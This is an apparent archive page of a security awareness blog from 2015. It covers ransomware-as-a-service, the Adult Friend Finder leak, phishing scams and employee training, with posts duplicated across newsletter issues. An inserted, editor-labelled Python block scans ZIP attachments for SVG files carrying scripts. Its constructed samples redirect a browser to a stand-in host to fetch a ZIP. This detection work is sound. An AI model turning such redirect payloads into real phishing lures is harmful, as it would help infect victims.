KnowBe4 Security Awareness Training Blog

It's heeere! Criminal Ransomware as a Service

Posted by Stu Sjouwerman on May 28, 2015 9:56:00 AM

As we predicted in our whitepaper "Your Money or Your Life/Files", there is now shake-and-bake criminal ransomware that aspiring Internet criminals can put together in a few minutes. Meet 'Tox', Ransomware for the rest of us.

In short, you can now go to this TOR website "for criminals by criminals", roll your own ransomware for free, and the site takes a 20% kickback of every Bitcoin ransom payment.  

Jim Walter at McAfee Labs commented: "The packaging of malware and malware-construction kits for cybercrime “consumers” has been a long-running trend. Various turnkey kits that cover remote access plus botnet plus stealth functions are available just about anywhere. Ransomware, though very prevalent, has not yet appeared in force in easy-to-deploy kits. But now we have Tox–and it’s free."


The Information Security Policy Trap

Posted by Stu Sjouwerman on May 27, 2015 9:42:32 AM

InfoSec genius Ben Tomhave wrote:

"It's that time of year again: time to update the policies! This annual exercise is always a source of great enjoyment for me (no, not really). After all, there's nothing like having the non-technical flailing about as they try to force-feed technical requirements down the throats of IT without explaining, justifying, or providing any factual basis for asking. If there's something most techies love, it's an over-the-top policy recommended by external auditors.

Quite frankly, policies are the precursor to, and embodiment of, the checkbox-compliance mindset. We all know how well that's worked out for us thus far. I mean, looking at all the data breaches we're not having thanks to compliance and policies, right? Hahaha... oh.


Is Your Network Infected With Sleeper Ransomware?

Posted by Stu Sjouwerman on May 26, 2015 6:11:00 PM

This is a concerning new "sleeper" ransomware twist.

It's called Locker and has been infecting employees' workstations, but it sat there silently until midnight on May 25, 2015, when it woke up. Locker then started to wreak havoc in a massive way.

Since this strain reared its ugly head, Reddit has a topic on it with over 600 comments.

Bleepingcomputer has a support topic that is 14 pages long, and they have received hundreds of emails from consultants all over the world. Based on their experience with cryptoware, they stated this strain has a large "installed" base, which does not bode well. Topics related to this new strain are suddenly being posted on all the major support boards, AV forums, etc.


Will Your Contractors Take Down Your Business?

Posted by Stu Sjouwerman on May 26, 2015 11:07:22 AM

Do you know how well your vendors, business associates, contracted third parties (who I will collectively call “contractors”) are protecting the information with which you’ve entrusted them to perform some sort of business activity? You need to know.

Late last year, a study of breaches in the retail industry revealed 33 percent of them were from third party vendor access vulnerabilities. The largest healthcare breach in 2014 was from a business associate (the contractor of a hospital system) and involved the records of 4.5 million patients.

The list of breaches caused by contractors throughout all industries could fill a large book. The damage that your third parties can cause to your business can be significant. Do you know the risks that your contractors and other third parties bring to your organization? Or, will your contractors take down your business because of their poor security and privacy practices?

I’ve led over 300 contractor information security and privacy assessments. I’ve seen a lot of crazy things, risky things, and downright incredibly stupid things. I’ve also seen a lot of common information security and privacy problems that contractors bring to those hiring them.

As a start to your contractor information security and privacy management activities, here are five things to check on when contracting another company to perform services on your behalf, especially those involving personal information.

  1. Documented information security and privacy policies and procedures need to exist. And not only exist: the employees also need to know they exist, and they need to be actually following them. The policies and procedures also need to be kept updated to address changes in the business environment and the risk environment, and to meet changes in legal requirements. A large portion of the contractors I’ve assessed said they had policies and procedures, but when I asked to see them they replied something to the effect of, “Oh, they are undocumented but understood policies. We are a small company; we share our policies by word of mouth.”

You need to make sure they have documented policies and procedures. If it isn't written, it isn't true.

  2. They need to understand their obligations to appropriately safeguard personal information. In the past year I’ve actually had over a dozen contractors state that they did not believe they needed to safeguard personal information if that information is discoverable online. What blockheads are continuing to spread this horrible advice? Worse yet, some of the contractors with this belief were even selling the personal information to create another revenue path.

You need to make sure your contractors understand that they must appropriately secure, and not share, the personal information you’ve entrusted to them.

  3. They need to provide security awareness training. Many of the activities contractors say they do for training are not training. One contractor I assessed said their training was the message they sent to their employees telling them to read the information security policies; this is *not* training. Another contractor copied, verbatim, the entire HIPAA regulatory text, pasted it into ~300 PowerPoint slides, and then told their workers to “view” the “training” slides. This is not training. Information security and privacy training, and awareness communications, must actually provide educational value!

You need to make sure your contractors provide regular information security and privacy training to their workers, and regularly send awareness reminders.

  4. They don’t perform risk assessments. A large percentage of the contractors I’ve assessed, around 25 – 30 percent, had never performed a risk assessment. An additional percentage, also around 25 – 30 percent, had performed a risk assessment once, and that was it. Some of those solitary risk assessments were performed 5, 10, and in one case even 17 years ago. Yes, these two types of contractors together represent around half of the contractors. You cannot effectively secure information if you do not know where your risks are located and what kind of risks you have. These types of contractors are leaving your organization vulnerable.

You need to make sure your contractors have a risk management process in place.

  5. They don’t use basic security tools. Encryption, audit logs, mobile computing security tools, patch management, and other basics are not used by many contractors, even contractors providing IT services. Over the years I’ve found that a large majority of contractors did not use encryption on their web sites, even for forms where they were collecting personal information on behalf of the client who contracted them. They also often do not have their mobile devices encrypted, and most also don’t encrypt sensitive information they send using email and text messages. There is also a significant portion not logging access to personal information, and not logging major security events. And surprisingly, many still do not use comprehensive anti-malware tools or firewalls on personal devices. Even if such basic security was required within their SLA, that requirement was often not communicated to those who would need to implement such tools.

Make sure your contractors actually have basic, expected security tools implemented, beyond just including them within the contract and/or SLA. Your contractors need to use basic security tools to protect the information you’ve entrusted to them.

You Cannot Outsource Your Responsibility

This is also a very important thing to know: generally, a hold-harmless clause in the contract that you use to try to relieve yourself of all responsibility for the bad things caused by the contractor will *not* relieve you of all responsibility and accountability for breaches and other bad things that occur as a result of your vendors’ actions, vulnerabilities, or unaddressed threats. I’ve heard this belief from well over half of the organizations I’ve spoken with and done projects for in the past five or so years.

I am still hearing way too many organizations state something very similar to: “We outsourced so we wouldn’t be liable for the security of the information when it is under the care of the outsourced entity.” It simply does not work that way, folks; for many reasons. But bottom line, your responsibility for securing and using information appropriately follows that information to whomever you have contracted.

Remember…

Organizations will be judged by the company they keep … the businesses they contract. If organizations don’t want to become proactive about their oversight of those contracted entities, I have a question for them: Are they ready to pay for the security and privacy sins of their contracted entities?

Want to know more about how to effectively create a contractor information security and privacy oversight management process or program? On May 28 I am giving a free webinar for ISACA: An Effective Framework for Third-party Information Security and Privacy Oversight & Risk Management. Consider attending. It will be recorded and available for future viewing.

PS: If you have not done so already, find out how affordable Kevin Mitnick Security Awareness Training is, and be pleasantly surprised.

This was cross-posted from the Privacy Professor Blog.

CyberheistNews Vol 5 #20 Adult Friend Finder Hack Is Nightmare Phishing Problem

Posted by Stu Sjouwerman on May 26, 2015 9:18:23 AM

CyberheistNews Vol 5 #20 May 26, 2015

Adult Friend Finder Hack Is Nightmare Phishing Problem

Guys, we have a real phishing problem with this Adult Friend Finder (AFF) hack. This particular adult site is one of the most heavily trafficked websites in the U.S. and has 40 million registered users. A rough guess is that 10% of your users may be very worried at this time that their sexual preferences and/or activities are going to come out. These end-users are a security breach waiting to happen.

You may have heard about it, but in short, the story is that the AFF site owed $248,000 to someone, very likely an affiliate that was feeding them web traffic, and apparently AFF did not pay up. The affiliate had a hacker buddy who calls himself ROR[RG] and this guy decided to teach AFF a lesson.

He hacked them, exfiltrated at least 4 million records and then sent them a ransom demand of $100,000 to return the data. Again, apparently AFF did not pay up and ROR[RG] in retaliation posted these records on a Darknet Tor site, loaded with a ton of highly personal, sensitive information.

It includes their age, sexual preferences, state, zip code, username, IP address, and whether they are married or single, gay or straight, and are looking for a "cheating one night stand" or more, let's call it, unorthodox sexual activities. With a little bit of digging, these people are relatively easy to find. Bev Robb, who does malware and Dark Web research, wrote a blog post showing how easy it is.

FriendFinder Networks, a California-based company, wrote that it had hired FireEye's forensics unit, Mandiant, to investigate along with Holland and Knight, a law firm, and a public relations company specializing in cybersecurity.

"We cannot speculate further about this issue, but rest assured, we pledge to take the appropriate steps needed to protect our customers if they are affected," it said. The company could not be reached for further comment. UK TV Channel 4 reported it first, and stated exposed email addresses are receiving a wave of spam. Here is their 4-minute segment:
http://www.channel4.com/news/adult-friendfinder-dating-hack-internet-dark-web

Here Is The Problem

Any of these 40 million registered users is now a target for a multitude of social engineering attacks. Just one example: you can imagine that a man married to a woman but who is hunting down gay hookups on the side could easily be blackmailed, or receive a spear phishing email with a poisoned link that infects his workstation.

People that have extramarital affairs can be made to click on links in emails that threaten to out them. I can already see the phishing emails that claim people can go to a website to find out if their private data has been released. This is a nightmare that will be exploited by spammers, phishers and blackmailers, who are now gleefully rubbing their hands.

Mass media has jumped on this; the news of this hack is on CNN, NBC, you name it. If any of your users has registered on AFF, they have probably heard about it and are worried. This is a nightmare phishing scenario. Jilted spouses, divorce attorneys and private investigators are undoubtedly already poring over the data.

What To Do About It

This is not an easy one. I suggest you take immediate preventive action. It only takes one second for a worried end-user (or admin) to click on a link in an email and expose the network to attackers. I suggest you send something like this to your friends, family and end-users. Feel free to edit:

"Last week, news broke that the Adult Friend Finder website was hacked. This is one of the top adult websites for people that want casual encounters, possibly cheating on their spouse. The site has 40 million registered users, and millions of these records are now out in the open, exposing highly sensitive personal information. Internet criminals are going to exploit this in many ways, sending spam, phishing and possibly blackmail messages, using social engineering tactics to make people click on links or open infected attachments. Be on the lookout for threatening messages like this that slip through, and delete them immediately."

As you can see, stepping your users through effective security awareness training is an absolute must these days. For KnowBe4 customers, we have a new Social Networking template that lures people into clicking on a link to the "haveibeenpwned" website to see if their personal sensitive information was hacked. The subject of the template is "Hey, has your Adult Friend Finder secret come out?"

PS: If you have not done so already, find out how affordable Kevin Mitnick Security Awareness Training is, and be pleasantly surprised:
http://info.knowbe4.com/kmsat_get_a_quote_now

If This Is Your First Issue Of CyberheistNews...

CyberheistNews is the world's largest e-zine for IT professionals about social engineering and security awareness training. It is published by KnowBe4 LLC, arrives in your inbox once a week, and looks at IT security from the human side. KnowBe4 has partnered with Kevin Mitnick to create new-school Security Awareness Training combined with regular simulated phishing attacks.

In CyberheistNews we aim to help you keep your network safe with important news, hints, and tips, so that you are aware of the latest social engineering scams and can do something about them.

KnowBe4 lives 100% in the cloud; we use SalesForce as our CRM, and via their Data.com service we licensed your address. Consider this your sample issue. You can unsubscribe at any time (a few lines below), and you will stop receiving any and all further email.

Warm Regards,
Stu Sjouwerman

Quotes Of The Week

"Fidelity is the sister of justice." - Horace

"I told my wife the truth. I told her I was seeing a psychiatrist. Then she told me the truth: that she was seeing a psychiatrist, two plumbers, and a bartender." - Rodney Dangerfield

Thanks for reading CyberheistNews!

Security News

What Our Customers Say About Us

"Everything is going great! We got the training integrated into our LMS so everyone is taking it right along all our other required training. Even with a brisk employee turnover, our click rate runs between 0 and 4% depending on how many new employees are here “pre-training.”

"We receive genuine phishing emails from time to time (email security can’t catch them all) and they are quickly detected and promptly reported thanks to the training. I have recommended your security training and phishing exercises to a number of colleagues, and some of them followed up with a purchase.

"Many in my banking security peer group use and recommend you. Nice work, you guys!" - P.J. CISSP, Information Security Officer

InfoWorld's security guru Roger Grimes writes about KnowBe4's integrated training and phishing platform. Check out this article:
http://www.infoworld.com/article/2920804/security/get-real-about-user-security-training.html

This Week's Five Most Popular HackBusters Posts

What are IT security people talking about? Here are this week's five most popular hackbusters posts:

    1. Spy Agencies Hijack Google Play Store to Install Spyware on Smartphones
      http://www.hackbusters.com/news/stories/326697-spy-agencies-hijack-google-play-store-to-install-spyware-on-smartphones

    2. NetUSB Driver Flaw Exposes Millions of Routers to Hacking
      http://www.hackbusters.com/news/stories/325860-netusb-driver-flaw-exposes-millions-of-routers-to-hacking

    3. Who Really Invented Bitcoin?
      http://www.hackbusters.com/news/stories/323830-who-really-invented-bitcoin

    4. Anti-NSA Pranksters Planted Tape Recorders Across New York and Published Your Conversations
      http://www.hackbusters.com/news/stories/325983-anti-nsa-pranksters-planted-tape-recorders-across-new-york-and-published-your-conversations

    5. Free Ransomware Decryption and Malware Removal ToolKit
      http://www.hackbusters.com/news/stories/326769-free-ransomware-decryption-and-malware-removal-toolkit

Why Isn't User Training A Security Priority?

Only about half of companies offer any kind of security training, a CompTIA survey found. End users are widely seen as a weak link in the enterprise security chain. More than 80 percent of respondents to a QuinStreet Enterprise survey tapped end users as a top security risk for their organizations.

Craig Williams, security outreach manager for Cisco's Talos Security Intelligence and Research Group, said end users working outside the confines of corporate networks are a key entry point for attackers launching malvertising attacks.

"Attackers notice when machines are not up-to-date. They can find one that is not following security best practices and then embed a link so you have a landing page hosting a drive-by download attack. Then they use social engineering to trick users to look at that page, serve up some malware, and you are compromised," he said in an interview with eSecurity Planet earlier this year.

Despite this, however, recent research by IT trade association CompTIA found that just 54 percent of companies offer any kind of security training, with most doing so during employee onboarding. When CompTIA asked companies it surveyed why they did not offer security training to employees, "the biggest reason was there was no reason," said Seth Robinson, senior director of technology analysis at CompTIA. Read the full article at:
http://www.esecurityplanet.com/network-security/why-isnt-user-training-a-security-priority.html

Researchers Observe SVG Files Being Used To Distribute Ransomware

Researchers with AppRiver have observed attackers sending out phishing emails with SVG files attached – these files, when downloaded and executed, open up websites that download what appears to be CryptoWall ransomware.

AppRiver observed thousands of phishing emails – one was sent from a Yahoo address and claimed to include a resume – being sent to small stores, law offices, IT businesses, schools and more, Jon French, security analyst with AppRiver, told SCMagazine.com in a Thursday email correspondence.

In order for an infection to occur, user interaction is required more than once, French indicated. First, a user must download the ZIP attachment in the phishing email, which contains the SVG file. When the user opens the SVG file, a small JavaScript entry will cause their browser to open a website that leads to another ZIP file being downloaded. This file contains the payload, which must be manually executed.

When downloaded and executed, the SVG files cause websites to open up that download what appears to be CryptoWall ransomware. Read the full article here:
http://www.scmagazine.com/svg-files-attached-to-phishing-emails-distribute-what-is-apparently-cryptowall-ransomware/article/416143/

Study: Employees Acknowledge Risky Security Behavior, Continue To Do It

While most people acknowledge the security risks of opening an email from an unknown sender or downloading an app from an unauthorized app store, many continue to engage in this risky behavior.

A new study from Blue Coat Systems found that 82 percent of U.S. employees knew that opening an email from an unverified source is considered “very risky”; however, 17 percent still admitted to doing so. This 17 percent could be mostly composed of people who weren't aware that this behavior put their systems at risk, said Hugh Thompson, CTO and senior vice president, Blue Coat, in an interview with SCMagazine.com, although the survey did not relate the two questions.

Even still, Thompson suggested that those knowledgeable of the risk could be opening emails from unknown senders because, in reality, phishing emails are becoming trickier, and their perpetrators are personalizing attacks.

Thompson went on to say that everyone has a weak spot that could entice them to open an email, such as a favorite sports team, for example, and with social media making this information readily available, creating a convincing email isn't too difficult a task.

Considering that half of the 250 U.S. respondents to Blue Coat's survey were at the CIO level, even IT security pros fall victim to various attacks.

“We do live in a time when anyone can be deceived,” Thompson said. “Anyone can be phished, even the most paranoid.” Article at SC Mag:
http://www.scmagazine.com/blue-coat-system-conducts-security-survey/article/415611/

How Employee Training Can Affect The Organization

Employee training and awareness programs will have a huge effect on covered entities, according to all three healthcare leaders. With anything from phishing scams to sophisticated cyber attacks putting health data at risk, it’s important for staff members to have a comprehensive idea of what type of malicious activity to be on alert for.

“The trick is, how do we balance that with everything else that’s required for [employees] to keep up their practices and actually what they need to do: treat patients,” Ewell said.

Not only is employee training critical, according to Sah, employee training at all levels is necessary. Everyone from senior level to contributors to those affiliated with a covered entity’s partners and vendors must have an understanding of proper health data security.

“All can fail if people are not aware,” Sah said. “And they need to be aware in a way that when they see malicious activity or they see something abnormal, that they have the awareness, knowledge, and know-how to take the next step of action.”

For example, if an employee sees what they think might be a phishing email, it’s essential to not only recognize it as malicious activity, but to then take the next step and notify the necessary personnel. That will better help the organization respond to the issue, Sah explained.

“A single person who is not aware can still cause a gap that can then be leveraged to create the types of threats or attacks we’ve seen,” said Sah. “[Employee training] is the most invaluable thing that any organization can do.” Full article at HealthIT Security:
http://healthitsecurity.com/news/important-lessons-for-health-data-privacy-security-in-2015

Cyberheist 'FAVE' LINKS:

    • Zlata wows the audience at the talent show Star King Korea 2015. She comes from Russia. She is a gymnast, model, actress and winner of four Guinness World records. According to the Discovery Channel, she is the "most flexible woman in the world". Holy Schmoly!
      http://www.flixxy.com/flexible-woman-at-korean-talent-show.htm?utm_source=4
    • Alexandru Duru Flies 905 Feet On A Real Hoverboard. I want one!:
      http://www.flixxy.com/alexandru-duru-flies-905-feet-on-a-real-hoverboard.htm?utm_source=4
    • Strong winds at Madeira airport make landing an airplane a real challenge. Yikes, some of these are literally touch and go:
      http://www.flixxy.com/windy-landings-and-awesome-go-arounds-at-madeira-airport.htm?utm_source=4
    • Theo Jansen creates huge wind-powered creatures that move entirely on their own.
      http://www.flixxy.com/wind-powered-creatures-by-theo-jansen.htm?utm_source=4
    • Ruti, the cat, brings the dog back home on a leash. Hilarious!
      http://www.flixxy.com/cat-taking-the-dog-home.htm?utm_source=4
    • Check out this guy! Gasper Nali from Malawi, Africa produces an awesome beat on his home-made 'babatone':
      http://www.flixxy.com/awesome-african-musician-gasper-nali.htm?utm_source=4
    • A compilation of smart and funny dogs doing things to entertain their humans; check out this dog playing pool, he's good!:
      http://www.flixxy.com/smart-and-funny-dogs.htm?utm_source=4

Copyright © 2014-2015 KnowBe4 LLC, All rights reserved.
Our mailing address is: 33 N. Garden Ave Suite 1200, Clearwater, Florida, 33755

Adult Friend Finder Hack Is Nightmare Phishing Problem

Posted by Stu Sjouwerman on May 23, 2015 10:21:00 AM

Guys, we have a real phishing problem with this Adult Friend Finder (AFF) hack. This particular adult site is one of the most heavily-trafficked websites in the U.S. and has 40 million registered users. A rough guess is that 10% of your users may be very worried at this time that their sexual preferences and/or activities are going to come out. These end-users are a security breach waiting to happen. 


Researchers Observe SVG Files Being Used To Distribute Ransomware

Posted by Stu Sjouwerman on May 23, 2015 8:04:00 AM

Researchers with AppRiver have observed attackers sending out phishing emails with SVG files attached – these files, when downloaded and executed, open up websites that download what appears to be CryptoWall ransomware.

AppRiver observed thousands of phishing emails – one was sent from a Yahoo address and claimed to include a resume – being sent to small stores, law offices, IT businesses, schools and more, Jon French, security analyst with AppRiver, told SCMagazine.com in a Thursday email correspondence.

In order for an infection to occur, user interaction is required more than once, French indicated. First, a user must download the ZIP attachment in the phishing email, which contains the SVG file. When the user opens the SVG file, a small JavaScript entry will cause their browser to open to a website that leads to another ZIP file being downloaded. This file contains the payload, which must be manually executed.
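A defender-side check for the attachment chain described above (here and in the CyberheistNews item on the same AppRiver report), written as an added example by the editor; it is not code from the original post or from AppRiver. It unpacks a ZIP attachment in memory, parses each SVG member, and flags the active-content features a résumé image should never need: script elements, on* event handlers, javascript: hrefs and HTML-embedding elements. The sample attachments, the member names and the example.invalid URLs are constructed for the demonstration.

```python
"""Flag SVG attachments that carry active content (script elements, event
handlers, javascript: links). Added example; all sample inputs are constructed."""
import io
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample attachments (not real phishing artifacts).
SVG_WITH_SCRIPT = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <script>window.location = "http://example.invalid/resume.zip";</script>
  <rect width="10" height="10"/>
</svg>"""

SVG_WITH_HANDLER = b"""<svg xmlns="http://www.w3.org/2000/svg"
  onload="window.location='http://example.invalid/'"><circle r="4"/></svg>"""

SVG_CLEAN = b"""<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>"""

# Elements that can embed foreign (HTML) content inside an SVG document.
EMBEDDING_TAGS = ("foreignobject", "iframe")


def svg_findings(data: bytes) -> list:
    """Return the reasons an SVG should be treated as active content.

    An empty list means nothing suspicious was found. A document that does
    not parse is reported as a finding too: a mail gateway should not wave
    through an "image" it cannot read.
    """
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable SVG ({exc})"]
    for elem in root.iter():
        tag = elem.tag.split("}")[-1].lower()  # strip the XML namespace
        if tag == "script":
            findings.append("<script> element")
        elif tag in EMBEDDING_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            local = attr.split("}")[-1].lower()  # e.g. xlink:href -> href
            if local.startswith("on"):
                findings.append(f"{local} event handler")
            if local == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: href")
    return findings


def scan_zip(zip_bytes: bytes) -> dict:
    """Map each .svg member of a ZIP attachment to its findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".svg"):
                report[name] = svg_findings(zf.read(name))
    return report


def build_sample_zip() -> bytes:
    """Build the constructed ZIP attachment used for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("resume.svg", SVG_WITH_SCRIPT)
        zf.writestr("logo.svg", SVG_WITH_HANDLER)
        zf.writestr("icon.svg", SVG_CLEAN)
    return buf.getvalue()


if __name__ == "__main__":
    for name, findings in scan_zip(build_sample_zip()).items():
        verdict = "QUARANTINE" if findings else "ok"
        print(f"{name}: {verdict} {findings}")
```

The check is deliberately structural rather than signature-based: it does not look for a particular URL or payload, so it still fires on variants of the lure as long as the SVG has to execute something to redirect the browser. A gateway that cannot strip attachments entirely can use a non-empty result to quarantine the message or to rewrite the SVG as a rasterized image.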


CyberheistNews Vol 5 #19 Scam Of The Week: Red Bull Money Mule Victims

Posted by Stu Sjouwerman on May 19, 2015 8:58:32 AM

CyberheistNews Vol 5 #19 May 19, 2015

Scam Of The Week: Red Bull Money Mule Victims

Warn your employees, friends and family about a cunning money laundering scam that is currently back on the rise. This lure was first used during spring break in 2014 and was apparently successful, because it's back.

It's an email claiming to be from Red Bull that offers to place Red Bull ads on the victim's car for 600 bucks a week. It all sounds innocent enough: wrap your car with advertising and make money driving around town. There is a nasty catch though.

The scam email explains the benefits of the "business offer" and promises easy money that basically will pay for the whole car, gas money included. However, if you sign up for it, this deal backfires and the victim is investigated for money laundering fraud.

How This Scam Works

The first payment that arrives is much larger than originally agreed upon. The criminals apologize for the "error" and ask the victim to quickly deduct their own fee and wire the rest of the money back to them.

However, it's either a forged or stolen check the victim received in the first place, or it's a fraudulent wire transfer from an account that was criminally taken over. In both cases the victim is left holding the bag when the cops come knocking on their door. All initial evidence of the fraud will point to them.

What To Do About It

I strongly recommend you send the following to your employees, friends and family. Feel free to copy/paste/edit:

"A new job scam is doing the rounds, preying on people that want to make $600 a week with Red Bull advertising on their car. It sounds like a great deal, but this scam is run by criminals that will try to use their victims for money laundering. If you get an email claiming to be from Red Bull that offers you an attractive advertising deal, use that delete key. In general, be very careful with any Internet "work from home" schemes; many of these are fraudulent. Do not give out any personal information to these criminals, and warn your family members."

For KnowBe4 customers, we have a new phishing template in the Online Services campaign called "Advertising for Red Bull Energy Drink". Send it to your employees and inoculate them against bogus second job offers before they get into some real trouble.

There is an example of the scam email at the KnowBe4 Blog:
http://blog.knowbe4.com/scam-of-the-week-red-bull-money-mule-victims

Heads-up: 'Breaking Bad' Ransomware Beta Tested Down Under

You can expect ransomware in America in the next few weeks which has a Breaking Bad theme. Take this a bit further and we can expect ransomware with Halloween themes later this year. Sheesh.

Some criminals are too smart for their own good though, because using a TV show like this will make it much more recognizable and written about, defeating the purpose.

Apart from the Breaking Bad theme, CryptoLocker.S is pretty generic ransomware. It is surprising how fast ransom Trojans have spread. A year ago every new strain was headline news; now it's on page 3. This version grabs a wide range of data files and encrypts them using a random AES key, which is then itself encrypted using a public key.

Your employees can run into this strain like any other ransom Trojan by opening an infected email attachment. It even opens a legitimate PDF file to trick your users into thinking everything is fine. In the meantime, back at the server farm... Anyway, block all zip files at the edge if you have not already, and make 100% sure your Backup/Restore actually works. More details and a link to Symantec, who found this strain, at the KnowBe4 Blog:
http://blog.knowbe4.com/heads-up-breaking-bad-ransomware-beta-tested-down-under

Need Your Input On Mobile Security Awareness Training      

We are trying to establish your interest in a mobile security awareness training platform for your employees. This platform is an app that runs on their smartphone and has several features to help you keep your network safe by improving and reinforcing your human firewall. Please take 1 minute to answer 6 short questions and let us know what you think. Thanks so much in advance!

Here is the link to SurveyMonkey:
https://www.surveymonkey.com/s/KnowBe4Mobile

Warm Regards,
Stu Sjouwerman
Quotes Of The Week

"If you torture data sufficiently, it will confess to almost anything." - F. Menger

"The confession of evil works is the first beginning of good works." - Saint Augustine

Thanks for reading CyberheistNews!

Security News

Has Anyone Used KnowBe4?

May 14, 2014 7:45 AM BruceyBonus asked the following question at  the SpiceWorks Security Forum:

"Hi All, been in contact with a company called Knowbe4, they offer a simulated phishing attack to your users and discover how high your organization’s Phish-prone percentage is...anyone heard of them or used them? Any information would be greatly appreciated...Thanks"

Within 2 days there were almost 50 replies. If you want independent, actual users describing their experience in their own words, you should  read these (unedited) answers at the forum:
http://community.spiceworks.com/topic/951007-has-anyone-used-knowbe4?

Combine that with a very positive review in InfoWorld, and you know where to go if you want to do something about users who never learn to  avoid stupid security mistakes that compromise your organization.

InfoWorld's security guru Roger Grimes writes about KnowBe4's integrated  training and phishing platform. Check out this article:
http://www.infoworld.com/article/2920804/security/get-real-about-user-security-training.html

This Week's Five Most Popular HackBusters Posts

What are IT security people talking about? Here are this week's five most popular HackBusters posts:
    1. Feds Say That Banned Researcher Commandeered a Plane:
       http://www.hackbusters.com/news/stories/323529-feds-say-that-banned-researcher-commandeered-a-plane

    2. CHIP — The World's First $9 Computer:
       http://www.hackbusters.com/news/stories/321580-chip-the-world-s-first-9-computer

    3. Unwilling DNA Samples Used In Advertising:
       http://www.hackbusters.com/news/stories/323839-unwilling-dna-samples-used-in-advertising

    4. This Little 3-D Printed Robot Cracks Combination Locks In 30 Seconds:
       http://www.hackbusters.com/news/stories/322680-this-little-3-d-printed-robot-cracks-combination-locks-in-30-seconds

    5. Police warn of PennDOT 'phishing' scam:
       http://www.hackbusters.com/news/stories/322719-police-warn-of-penndot-phishing-scam-abc27

Starbucks Hack: A Great Example Why You Should Not Reuse Passwords

Use this story and send it to your employees as a cautionary tale to make it real to them that they should not reuse passwords in general, but especially not for any online payment accounts!

News broke this week that smart thieves use the Starbucks mobile app to steal money from users' bank accounts. You can use the app to pay at the Starbucks checkouts with your smartphone, and you can also set it up to draw money from a linked account to reload your Starbucks card. The coffee giant now operates the most popular mobile wallet payment system in the U.S., so this is a big deal.

The attackers have been breaking into Starbucks accounts to repeatedly transfer money from bank accounts using the app's auto-reload function.  Starbucks hasn’t been able to stop fraudulent transactions even when  they are reported within a few minutes.

The problem is that the cyber thieves just need the user name and password to get into the account. Starbucks publicly stated that their system has not been breached, but that these thefts are carried out with credentials stolen from other sites, which is exactly what causes this problem for people who reuse their user name and password on multiple sites.

So here are a few rules for online payments:

    1. Use a unique pass-phrase for online payment accounts. Do not reuse that pass-phrase anywhere else.

    2. DO NOT share passwords across apps. This is hard but not impossible, especially if you use password managers like OnePass or LastPass.

    3. If you link an app for online payments, only use credit cards and never use debit cards or, God forbid, your bank account, which is simply asking for trouble.

    4. Set your credit cards to email you real-time confirmation of expenses. I have an AMEX card that emails me the amount of any charge over a threshold I set.

Online payment systems are very convenient, but you need to use common sense and password discipline to make sure they don't become a major pain in the neck.

Wetware: The Major Data Security Threat You've Never Heard Of

Adam Levin, Forbes contributor, explains what wetware is to the uninitiated and makes the case for more budget for awareness training. This is great ammo to send to non-IT management level people.

He wrote: "For the first time, according to a recent study, criminal and state-sponsored hacks have surpassed human error as the leading cause of health care data breaches, and it could be costing the industry as much as $6 billion. With an average organization cost of $2.1 million per breach, the results of the study give rise to a question: How do you define human error?

"More than half of the respondents in the Ponemon Institute’s Fifth Annual Benchmark Study on Privacy & Security of Healthcare Data, said their organization’s incident response team was underfunded or understaffed and roughly one third of respondents had no incident response plan in place at all—zip, nada, zilch—a fact that beggars the imagination at a moment when breaches have become the third certainty in life, and one that highlights the seeming no-show of the “first do no harm” approach to patients on the data breach-prone operations side of the health care industry." More at Forbes:
http://www.forbes.com/sites/adamlevin/2015/05/14/wetware-the-major-data-security-threat-youve-never-heard-of/

The Best Defense Against Cybercrime? Get Your Employees On Board

The UK-based ITProPortal's Charles Orton-Jones recently surveyed more  than a thousand office workers in the UK to gain insights into employee  attitudes about cyber-security and data theft. Many see data theft as  a victimless crime, especially millennial employees.

That is a problem, but it gets worse. The survey also found that more than 72% of millennials believe they are entitled to take data they have worked on, compared with 41% of baby boomers. An organization’s approach to correcting such misperceptions internally should consider these generational differences.

The article lists 4 major items that you should address to make  protecting data part of your culture:
    • "Clarify the business risk: Leadership must detail the consequences  of a data breach to the company’s financial results, relationships  with customers, and reputation.

    • "Align with values and culture: Data protection isn’t just the  responsibility of IT, it’s the responsibility of everyone in an  organization. Ensure you have processes in place for employees to  voice concerns, particularly during times of company transition.

    • "Involve employees directly in solutions: The data showed millennials  in particular are motivated by direct engagement in problem-solving,  so enlist them to help develop approaches that will resonate with  their peers.

    • "Partner with the compliance and IT teams: Technology or compliance  training around cyber security should be preceded by awareness  campaigns that reinforce the business urgency."

Quite simply, creating a culture where employees respect data and are motivated to protect the business is critical to cyber security. More at:
http://www.itproportal.com/2015/05/15/best-defence-against-cyber-crime-get-your-employees-on-board/
Cyberheist 'FAVE' LINKS:

This Week's Five Most Popular HackBusters Posts 5/17/2015

Posted by Stu Sjouwerman on May 17, 2015 12:36:00 PM

What are IT security people talking about? Here are this week's five most popular hackbusters posts:
1) Feds Say That Banned Researcher Commandeered a Plane:
2) CHIP — The World's First $9 Computer:
3) Unwilling DNA Samples Used In Advertising:
4) This Little 3-D Printed Robot Cracks Combination Locks In 30 Seconds:
5) Police warn of PennDOT 'phishing' scam:

Starbucks Hack: A Great Example Why You Should Not Reuse Passwords

Posted by Stu Sjouwerman on May 17, 2015 11:58:00 AM

Use this story and send it to your employees as a cautionary tale to make it real to them that they should not reuse passwords in general, but especially not for any online payment accounts!

News broke this week that smart thieves use the Starbucks mobile app to steal money from users' bank accounts. You can use the app to pay at the checkouts with your smartphone, and you can also set it up to draw money from a linked account to reload your Starbucks card. The coffee giant now operates the most popular mobile wallet payment system in the U.S., so this is a big deal.
